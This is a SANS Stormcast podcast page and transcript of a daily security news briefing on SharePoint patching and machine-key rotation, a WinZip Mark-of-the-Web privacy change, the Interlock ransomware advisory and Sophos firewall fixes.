SANS Stormcast Wednesday, July 23rd, 2025: Sharepoint 2016 Patch; MotW Privacy and WinZip; Interlock Ransomware; Sophos Patches

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9538.mp3

previous

next

Sharepoint 2016 Patch; MotW Privacy and WinZip; Interlock Ransomware; Sophos Patches

00:00

iTunes

MP3 Download

RSS Feed

Google

Podbean

Amazon Echo

YouTube

Spreaker

Spotify

Discussion

Login here to join the discussion.

Podcast Transcript

 Hello and welcome to the Wednesday, July 23rd, 2025
 edition of the SANS Internet Storm Center's Stormcast. My
 name is Johannes Ullrich, recording today from
 Jacksonville, Florida. And this episode is brought to you
 by the SANS.edu Bachelor's Degree Program in Applied
 Cybersecurity. SharePoint is still at the top of
 everybody's mind and the tool shell vulnerability is still
 being exploited. Microsoft has now also released an update
 for SharePoint 2016. Yesterday, we only had the
 update for 2019 and for the subscription edition. Another
 thing to point out here, there are actually two files that
 need to download and apply for 2019 and 2016. The first one
 is the security update for SharePoint itself. And then
 there is a second one, the language pack. When you
 install the security update for Microsoft SharePoint, you
 will have to reboot your system and then you'll apply
 the language pack. The language pack update does not
 require another reboot, but you can't apply them at the
 same time. Try it to save some time and, well, they're
 actually then failing. So, make sure you apply one after
 the other. There's another thing that I think has been a
 little bit overlooked in all of this. And that's step four
 here in Microsoft's response timeline that they published.
 There's part of this update. The early exploits that were
 used against SharePoint that took advantage of this
 vulnerability, they all had in common that they stole the
 system machine keys. And, well, that's actually a common
 thing to do if you're exploiting a .NET application.
 Because if you do have the machine keys, you can then
 fake a view state. And, essentially, you can come back
 and exploit the system again. So, if you're just updating
 the patch and removing any backdoors or web shells or
 other files that you may find that an attacker may have
 created, this is not sufficient if the attacker
 stole the machine keys. You must update the machine keys.
 Otherwise, you're opening yourself up to a repeat
 compromise. And the Didier found an interesting little privacy
 issue that comes up if you're using WinZIP 710 or later. The
 issue here is, well, the good old mark of the web. I'm
 mentioning this at least like once a week or so here on the
 podcast. But, typically, on Windows, the mark of the web,
 it includes a zone ID 3 for indicating that the file was
 downloaded from the Internet. And then it also typically
 includes the URL it was downloaded from. Well, that,
 of course, is something that you may not necessarily tell
 people that you're sending files to. So, WinZIP now has
 the option, and that's the default setting, to only
 include the zone value. So, the recipient of a zip file,
 including files that were downloaded from the Internet,
 will still know that, hey, these files were downloaded
 from the Internet. But they will no longer be able to see
 what website the particular file was downloaded from. You
 can uncheck this particular value, and then it will behave
 just like it used to in older versions. And the FBI, with
 other government agencies, has published a nice write-up
 about the interlock ransomware. CISA and FBI have
 done this a number of times in the past for various
 ransomware groups. This is not usually because this
 particular malware is brand new, but because it is sort of
 one of the dominating ransomware samples that
 they're seeing these days. It has very nice, hands-on
 information about how to detect and how to prevent this
 particular ransomware. Apparently, this ransomware
 often arrives as, essentially, a fake browser update. And as
 that is then being installed by the user. So, not so much
 hoping for technical exploits here. They're also using the
 famous click-fix technique, where, essentially, the user
 is tricked into copy-pasting some PowerShell code into
 their system. Well, with sort of the pretense of having to
 bypass CAPTCHA in order to move on to the next page. And
 Sophos released an update for its firewalls, fixing a total
 of five different vulnerabilities, two of which
 are rated critical by Sophos. One of the critical
 vulnerabilities is an arbitrary file write
 vulnerability that may lead to arbitrary code execution
 without authentication. The next critical one is SQL
 injection vulnerability in their transparent SMTP proxy,
 which they call a legacy feature. Both of these
 vulnerabilities only apply to very specific features. For
 example, the arbitrary file upload vulnerability only
 applies to devices in high -availability mode. And, well,
 Sophos thinks that's only 0.05 % of devices. Same for the SQL
 injection vulnerability. This SMTP proxy is a legacy
 feature. And Sophos thinks only 0.73% of users have this
 feature enabled. So, get it updated. You never know if
 you're going to enable one of those features by mistake or
 maybe intentionally and get it out of the way. Also, some of
 these high vulnerabilities and such are probably things that
 you should better update. Well, and that's it for today.
 So, thanks again for listening and talk to you again
 tomorrow. Bye.